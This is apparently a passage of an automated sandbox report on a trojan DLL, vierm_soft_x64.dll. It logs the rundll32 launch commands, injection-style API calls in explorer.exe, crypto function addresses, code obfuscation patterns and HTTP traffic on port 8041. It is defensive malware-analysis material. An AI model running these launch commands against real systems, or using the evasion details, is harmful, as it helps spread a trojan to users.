Source: C:\Windows\explorer.exe	Code function: 30_2_089D82B4 NtFreeVirtualMemory,	30_2_089D82B4
Source: C:\Windows\explorer.exe	Code function: 30_2_089DB388 NtAllocateVirtualMemory,	30_2_089DB388
Source: C:\Windows\explorer.exe	Code function: 30_2_089DC704 NtDelayExecution,	30_2_089DC704
Source: C:\Windows\explorer.exe	Code function: 30_2_089D80B8 RtlInitUnicodeString,NtCreateFile,	30_2_089D80B8
Source: C:\Windows\explorer.exe	Code function: 30_2_089D8240 NtClose,	30_2_089D8240
Source: C:\Windows\explorer.exe	Code function: 30_2_089E01A0 NtFreeVirtualMemory,	30_2_089E01A0
Source: C:\Windows\explorer.exe	Code function: 30_2_089D81C8 NtWriteFile,	30_2_089D81C8
Source: C:\Windows\explorer.exe	Code function: 30_2_089E0130 NtAllocateVirtualMemory,	30_2_089E0130

Detected potential crypto function

Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180041FEC	3_2_0000000180041FEC
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001CFF8	3_2_000000018001CFF8
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018003203C	3_2_000000018003203C
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180020044	3_2_0000000180020044
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018004C060	3_2_000000018004C060
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001E080	3_2_000000018001E080
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180033088	3_2_0000000180033088
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001F0D0	3_2_000000018001F0D0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001D104	3_2_000000018001D104
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018002C168	3_2_000000018002C168
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180021188	3_2_0000000180021188
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180024198	3_2_0000000180024198
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00000001800221A0	3_2_00000001800221A0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00000001800251B0	3_2_00000001800251B0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00000001800231B8	3_2_00000001800231B8
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001F1D8	3_2_000000018001F1D8
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001E1D8	3_2_000000018001E1D8
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001D260	3_2_000000018001D260
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001E2E0	3_2_000000018001E2E0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001F2E0	3_2_000000018001F2E0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018003430C	3_2_000000018003430C
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001D364	3_2_000000018001D364
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180031388	3_2_0000000180031388
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018002238C	3_2_000000018002238C
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018002539C	3_2_000000018002539C
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00000001800233A0	3_2_00000001800233A0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00000001800123AC	3_2_00000001800123AC
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00000001800213B4	3_2_00000001800213B4
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00000001800243C4	3_2_00000001800243C4
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001E3E8	3_2_000000018001E3E8
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018002E400	3_2_000000018002E400
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180032408	3_2_0000000180032408
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001F448	3_2_000000018001F448
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001D490	3_2_000000018001D490
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018004249C	3_2_000000018004249C
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001E4F0	3_2_000000018001E4F0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018002C4F8	3_2_000000018002C4F8
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001C500	3_2_000000018001C500
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018004C510	3_2_000000018004C510
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001F550	3_2_000000018001F550
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018002E554	3_2_000000018002E554
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018003356C	3_2_000000018003356C
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018002358C	3_2_000000018002358C
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001D598	3_2_000000018001D598
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018002159C	3_2_000000018002159C
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00000001800245AC	3_2_00000001800245AC
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00000001800225BC	3_2_00000001800225BC
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00000001800255CC	3_2_00000001800255CC
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001C608	3_2_000000018001C608
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018002B620	3_2_000000018002B620
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001F658	3_2_000000018001F658
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001E65C	3_2_000000018001E65C
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001D6A0	3_2_000000018001D6A0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018002E6D0	3_2_000000018002E6D0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001C710	3_2_000000018001C710
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001F760	3_2_000000018001F760
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180021784	3_2_0000000180021784
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180024794	3_2_0000000180024794
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001E7A0	3_2_000000018001E7A0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00000001800227A8	3_2_00000001800227A8
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001D7A8	3_2_000000018001D7A8
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00000001800317BC	3_2_00000001800317BC
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00000001800237BC	3_2_00000001800237BC
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00000001800327EC	3_2_00000001800327EC
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001C81C	3_2_000000018001C81C
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018004A838	3_2_000000018004A838
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001F8B8	3_2_000000018001F8B8
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001E8E4	3_2_000000018001E8E4
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001D900	3_2_000000018001D900
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018002C904	3_2_000000018002C904
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001C978	3_2_000000018001C978
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180022990	3_2_0000000180022990
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00000001800239A8	3_2_00000001800239A8
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00000001800219B0	3_2_00000001800219B0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018002B9B4	3_2_000000018002B9B4
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00000001800249C0	3_2_00000001800249C0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001F9C0	3_2_000000018001F9C0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001DA08	3_2_000000018001DA08
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001EA28	3_2_000000018001EA28
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180033A3C	3_2_0000000180033A3C
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001CA80	3_2_000000018001CA80
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001FAC8	3_2_000000018001FAC8
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001DB10	3_2_000000018001DB10
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001EB58	3_2_000000018001EB58
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001CB88	3_2_000000018001CB88
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180023B94	3_2_0000000180023B94
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180021B98	3_2_0000000180021B98
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180024BA8	3_2_0000000180024BA8
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180032BB8	3_2_0000000180032BB8
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180022BBC	3_2_0000000180022BBC
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001FBD0	3_2_000000018001FBD0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180042BFC	3_2_0000000180042BFC
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180031C08	3_2_0000000180031C08
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001DC18	3_2_000000018001DC18
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001EC60	3_2_000000018001EC60
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180055C62	3_2_0000000180055C62
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001CC90	3_2_000000018001CC90
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180046CAC	3_2_0000000180046CAC
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001FD28	3_2_000000018001FD28
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001ED68	3_2_000000018001ED68
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001DD70	3_2_000000018001DD70
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180021D84	3_2_0000000180021D84
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180024D94	3_2_0000000180024D94
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180022DA4	3_2_0000000180022DA4
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180023DC4	3_2_0000000180023DC4
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018002BDDC	3_2_000000018002BDDC
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001CDE8	3_2_000000018001CDE8
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001FE30	3_2_000000018001FE30
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001EE70	3_2_000000018001EE70
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001DE74	3_2_000000018001DE74
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180033E98	3_2_0000000180033E98
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001CEF0	3_2_000000018001CEF0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180044F38	3_2_0000000180044F38
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001FF38	3_2_000000018001FF38
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001DF78	3_2_000000018001DF78
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180022F8C	3_2_0000000180022F8C
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180020FA0	3_2_0000000180020FA0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180023FB0	3_2_0000000180023FB0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180021FB4	3_2_0000000180021FB4
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180024FC4	3_2_0000000180024FC4
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001EFC8	3_2_000000018001EFC8
Source: C:\Windows\System32\rundll32.exe	Code function: 23_2_0000029F3B7929EE	23_2_0000029F3B7929EE
Source: C:\Windows\System32\rundll32.exe	Code function: 23_2_0000029F3B7931BE	23_2_0000029F3B7931BE
Source: C:\Windows\System32\rundll32.exe	Code function: 23_2_0000000273F807BE	23_2_0000000273F807BE
Source: C:\Windows\System32\rundll32.exe	Code function: 23_2_0000000273F7FFEE	23_2_0000000273F7FFEE
Source: C:\Windows\System32\rundll32.exe	Code function: 23_2_0000029F3B8F55C0	23_2_0000029F3B8F55C0
Source: C:\Windows\System32\rundll32.exe	Code function: 23_2_0000029F3B8F16A0	23_2_0000029F3B8F16A0
Source: C:\Windows\System32\rundll32.exe	Code function: 23_2_0000029F3B8F42A0	23_2_0000029F3B8F42A0
Source: C:\Windows\System32\rundll32.exe	Code function: 23_2_0000029F3B9082A0	23_2_0000029F3B9082A0
Source: C:\Windows\System32\rundll32.exe	Code function: 23_2_0000029F3B8E99D0	23_2_0000029F3B8E99D0
Source: C:\Windows\System32\rundll32.exe	Code function: 23_2_0000029F3B90B5E0	23_2_0000029F3B90B5E0
Source: C:\Windows\System32\rundll32.exe	Code function: 23_2_0000029F3B9055E0	23_2_0000029F3B9055E0
Source: C:\Windows\System32\rundll32.exe	Code function: 23_2_0000029F3B910210	23_2_0000029F3B910210
Source: C:\Windows\System32\rundll32.exe	Code function: 23_2_0000029F3B907220	23_2_0000029F3B907220
Source: C:\Windows\System32\rundll32.exe	Code function: 23_2_0000029F3B904550	23_2_0000029F3B904550
Source: C:\Windows\System32\rundll32.exe	Code function: 23_2_0000029F3B8E5D60	23_2_0000029F3B8E5D60
Source: C:\Windows\System32\rundll32.exe	Code function: 23_2_0000029F3B8F4DB0	23_2_0000029F3B8F4DB0
Source: C:\Windows\System32\rundll32.exe	Code function: 23_2_0000029F3B8FB4E0	23_2_0000029F3B8FB4E0
Source: C:\Windows\System32\rundll32.exe	Code function: 23_2_0000029F3B8FA100	23_2_0000029F3B8FA100
Source: C:\Windows\System32\rundll32.exe	Code function: 23_2_0000029F3B8E9500	23_2_0000029F3B8E9500
Source: C:\Windows\System32\rundll32.exe	Code function: 23_2_0000029F3B8F9120	23_2_0000029F3B8F9120
Source: C:\Windows\System32\rundll32.exe	Code function: 23_2_0000029F3B911490	23_2_0000029F3B911490
Source: C:\Windows\System32\rundll32.exe	Code function: 23_2_0000029F3B90FBC0	23_2_0000029F3B90FBC0
Source: C:\Windows\System32\rundll32.exe	Code function: 23_2_0000029F3B8FCBE0	23_2_0000029F3B8FCBE0
Source: C:\Windows\System32\rundll32.exe	Code function: 23_2_0000029F3B912812	23_2_0000029F3B912812
Source: C:\Windows\System32\rundll32.exe	Code function: 23_2_0000029F3B911F40	23_2_0000029F3B911F40
Source: C:\Windows\System32\rundll32.exe	Code function: 23_2_0000029F3B912F60	23_2_0000029F3B912F60
Source: C:\Windows\System32\rundll32.exe	Code function: 23_2_0000029F3B902BB0	23_2_0000029F3B902BB0
Source: C:\Windows\System32\rundll32.exe	Code function: 23_2_0000029F3B9013A3	23_2_0000029F3B9013A3
Source: C:\Windows\System32\rundll32.exe	Code function: 23_2_0000029F3B8FBED0	23_2_0000029F3B8FBED0
Source: C:\Windows\System32\rundll32.exe	Code function: 23_2_0000029F3B8E66C0	23_2_0000029F3B8E66C0
Source: C:\Windows\System32\rundll32.exe	Code function: 23_2_0000029F3B9066E0	23_2_0000029F3B9066E0
Source: C:\Windows\System32\rundll32.exe	Code function: 23_2_0000029F3B8EA730	23_2_0000029F3B8EA730
Source: C:\Windows\explorer.exe	Code function: 30_2_089D1A8C	30_2_089D1A8C
Source: C:\Windows\explorer.exe	Code function: 30_2_089D1A7C	30_2_089D1A7C
Source: C:\Windows\explorer.exe	Code function: 30_2_089D2164	30_2_089D2164

Found potential string decryption / allocating functions

Source: C:\Windows\System32\rundll32.exe	Code function: String function: 000000018004816C appears 44 times
Source: C:\Windows\System32\rundll32.exe	Code function: String function: 0000000180001400 appears 56 times

One or more processes crash

Source: C:\Windows\System32\rundll32.exe

Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7148 -s 328

Source: classification engine

Classification label: mal100.troj.evad.winDLL@28/25@5/3

Source: C:\Windows\System32\rundll32.exe

Code function: 23_3_00007DF49BA40000 CreateToolhelp32Snapshot,CloseHandle,

23_3_00007DF49BA40000

Source: C:\Windows\System32\rundll32.exe	Mutant created: NULL
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7376
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7596
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3648
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3480:120:WilError_03
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7468
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7620
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7148

Source: C:\Windows\System32\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\b0d21df3-edb9-4c03-81a1-5896762c4e04

Jump to behavior

Source: vierm_soft_x64.dll.dll

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\explorer.exe

File read: C:\Users\desktop.ini

Source: C:\Windows\System32\loaddll64.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\loaddll64.exe

Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\vierm_soft_x64.dll.dll,AXA

Source: unknown	Process created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\vierm_soft_x64.dll.dll"
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\vierm_soft_x64.dll.dll",#1
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\vierm_soft_x64.dll.dll,AXA
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vierm_soft_x64.dll.dll",#1
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7148 -s 328
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3648 -s 316
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\vierm_soft_x64.dll.dll,AXC
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7376 -s 328
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\vierm_soft_x64.dll.dll,AXD
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7468 -s 320
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vierm_soft_x64.dll.dll",AXA
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vierm_soft_x64.dll.dll",AXC
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vierm_soft_x64.dll.dll",AXD
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vierm_soft_x64.dll.dll",AXS
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vierm_soft_x64.dll.dll",GetDeepDVCState
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7596 -s 324
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7620 -s 320
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\vierm_soft_x64.dll.dll",#1	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\vierm_soft_x64.dll.dll,AXA	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\vierm_soft_x64.dll.dll,AXC	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\vierm_soft_x64.dll.dll,AXD	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vierm_soft_x64.dll.dll",AXA	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vierm_soft_x64.dll.dll",AXC	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vierm_soft_x64.dll.dll",AXD	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vierm_soft_x64.dll.dll",AXS	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vierm_soft_x64.dll.dll",GetDeepDVCState	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vierm_soft_x64.dll.dll",#1	Jump to behavior

Source: C:\Windows\System32\loaddll64.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: netapi32.dll
Source: C:\Windows\explorer.exe	Section loaded: dsrole.dll

Source: C:\Windows\System32\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: vierm_soft_x64.dll.dll

Static PE information: Image base 0x180000000 > 0x60000000

Source: vierm_soft_x64.dll.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: vierm_soft_x64.dll.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: vierm_soft_x64.dll.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: vierm_soft_x64.dll.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: vierm_soft_x64.dll.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: vierm_soft_x64.dll.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: vierm_soft_x64.dll.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: kernel32.pdbUGP source: rundll32.exe, 00000017.00000003.1428461278.0000029F3B7E1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: kernelbase.pdbUGP source: rundll32.exe, 00000017.00000003.1412218953.0000029F3B8EE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\BUILD\work\b69487f8af4577da\BUILDSENG\Release\x64\ArPotEx64.pdb source: rundll32.exe, 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.1376710622.000000018005F000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000C.00000002.1415603065.000000018005F000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000F.00000002.1417110861.000000018005F000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000012.00000002.1427586345.000000018005F000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000013.00000002.1403034734.000000018005F000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000014.00000002.1428897792.000000018005F000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000017.00000002.2565190812.000000018005F000.00000002.00000001.01000000.00000003.sdmp, vierm_soft_x64.dll.dll
Source:	Binary string: ntdll.pdb source: rundll32.exe, 00000017.00000003.1411626568.0000029F3B7EA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: kernel32.pdb source: rundll32.exe, 00000017.00000003.1428461278.0000029F3B7E1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdbUGP source: rundll32.exe, 00000017.00000003.1411626568.0000029F3B7EA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: kernelbase.pdb source: rundll32.exe, 00000017.00000003.1412218953.0000029F3B8EE000.00000004.00000020.00020000.00000000.sdmp

Source: vierm_soft_x64.dll.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: vierm_soft_x64.dll.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: vierm_soft_x64.dll.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: vierm_soft_x64.dll.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: vierm_soft_x64.dll.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

PE file contains an invalid checksum

Source: vierm_soft_x64.dll.dll

Static PE information: real checksum: 0x81152 should be: 0xbc113

PE file contains sections with non-standard names

Source: vierm_soft_x64.dll.dll	Static PE information: section name: memcpy_
Source: vierm_soft_x64.dll.dll	Static PE information: section name: _RDATA

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\System32\rundll32.exe	Code function: 23_3_0000029F3B7A00D8 push cs; retf	23_3_0000029F3B7A00FD
Source: C:\Windows\explorer.exe	Code function: 30_2_089DEE21 push rsi; ret	30_2_089DEE27
Source: C:\Windows\explorer.exe	Code function: 30_2_089DF5BA push rcx; ret	30_2_089DF5BC
Source: C:\Windows\explorer.exe	Code function: 30_2_089DEF4F push D5912897h; iretq	30_2_089DEF57

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49758
